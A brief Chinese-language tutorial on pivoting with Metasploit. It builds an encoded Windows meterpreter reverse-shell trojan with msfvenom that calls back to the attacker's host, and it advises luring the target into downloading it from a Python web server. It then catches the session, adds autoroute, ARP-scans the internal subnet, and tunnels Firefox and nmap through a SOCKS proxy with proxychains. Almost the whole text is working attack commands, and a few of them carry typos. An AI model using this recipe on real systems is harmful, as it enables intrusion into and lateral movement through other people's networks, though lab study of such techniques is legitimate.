Pivotiing和自动路由
黑客(192.168.3.134)———-(192.168.3.133)server1(172.16.1.101)———-(172.16.1.102)server2
创建一个木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.134 lport=4444 -a x86 --platform windows -b "\x00\xff" -e x86/shikata_ga_nai -f exe > msf.exe
引诱对方下载
python -m SimpleHTTPServer 1234
打开msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.3.134
exploit
目标运行msf文件,就上线了
run get_local_sunets \\收集信息,查看网段
run autoroute -s 172.16.1.0/24 \\设置静态路由
run post/windows/gather/arp_scanner RHOSTS=172.16.1.0/24 \\扫描网段
backgroud
sessions
使用另一个模块
use auxiliary/server/socks_proxy
show options
set srvhost 127.0.0.1
set srvport 10044
sett version 4a
run
另开一个窗口
nano /etc/proxychains4.conf
在里面最后一行加上socks4 127.0.0.1 10044
保存退出
然后就可以通过proxychains firefox访问内网了
也可以使用nmap扫描